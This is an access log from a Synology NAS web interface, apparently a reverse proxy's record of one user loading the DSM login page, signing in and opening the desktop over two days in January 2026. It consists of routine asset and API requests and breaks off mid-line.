nas.profibot.hu "/scripts/ext-3/ux/images/svg/radio_button.svg" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/bt_information_mini.png?v=427ee9d0089241b7c40a6f9e5e2c7a4c" [Client 84.1.26.27] [Length 436] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:54:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 61] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=24&retina=false&path=webman/3rdparty/WebDAVServer/images/icon/WebDav_{0}.png&app_version=2.4.8-10135" [Client 84.1.26.27] [Length 2470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:17 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:18 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=websocket&sid=P6Ufen8gYxri1boEAAAC" [Client 84.1.26.27] [Length 6360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[15/Jan/2026:13:54:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 4327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:18:06:24 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 204.76.203.25] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 84.1.26.27] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 84.1.26.27] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.css?v=1654081517" [Client 84.1.26.27] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 84.1.26.27] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/css/desktop.css?v=1661421011" [Client 84.1.26.27] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 84.1.26.27] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 84.1.26.27] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 84.1.26.27] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 84.1.26.27] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 84.1.26.27] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/index.js?v=1650348555" [Client 84.1.26.27] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 84.1.26.27] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 84.1.26.27] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 84.1.26.27] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/noise-c.js?v=1650348555" [Client 84.1.26.27] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/noise/constants.js?v=1650348555" [Client 84.1.26.27] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vue/vue.min.js?v=1633587521" [Client 84.1.26.27] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/vuex/vuex.min.js?v=1585722123" [Client 84.1.26.27] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 84.1.26.27] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ext-all.js?v=1650348555" [Client 84.1.26.27] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 84.1.26.27] [Length 4629] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 84.1.26.27] [Length 185] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:35 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 84.1.26.27] [Length 585070] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/2.style.css" [Client 84.1.26.27] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 84.1.26.27] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 84.1.26.27] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 84.1.26.27] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 84.1.26.27] [Length 11206] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 84.1.26.27] [Length 100129] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:36 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login_background.jpg?id=1" [Client 84.1.26.27] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 69] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.6928208ca354b3a59af5.4.js" [Client 84.1.26.27] [Length 3157] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/944a992fb1e17b455579f66f923313fb.png" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[16/Jan/2026:11:11:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/1bc43875501e55e5e741e427ca50dbdf.png" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[16/Jan/2026:11:11:40 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/37727926274c0048982bf8cdf53824c8.svg" [Client 84.1.26.27] [Length 5638] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 334] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768561903452&SynoToken=kcDFKpRQAlHyU&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5259] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&SynoToken=kcDFKpRQAlHyU&v=1768242326" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3334] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 109139] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/34ac1bdf9b5af8bf425905e26994e7a7.png" [Client 84.1.26.27] [Length 1127] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/6cef68f76baafc82c0872419a3d9e48b.png" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=kcDFKpRQAlHyU&UserType=user&EIO=3&transport=polling&t=Pl6WGYg" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/739a21a1e93de2c1dbf6855ddda88c4c.png" [Client 84.1.26.27] [Length 1809] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/aba1d1ad2890d15e40e03c3c8883a34a.png" [Client 84.1.26.27] [Length 1678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_64.png?v=42962-s9" [Client 84.1.26.27] [Length 4315] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_64.png?v=42962-s9" [Client 84.1.26.27] [Length 2674] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/images/1x/help_64.png?v=42962-s9" [Client 84.1.26.27] [Length 6618] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SynologyAccount/SynologyAccount.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1069] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/5d0db4f65187f9ecb3e6b69bdf1ca516.png" [Client 84.1.26.27] [Length 1151] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=kcDFKpRQAlHyU&UserType=user&EIO=3&transport=polling&t=Pl6WGZg&sid=MYGbsqAY1nkgG_ZuAAAE" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 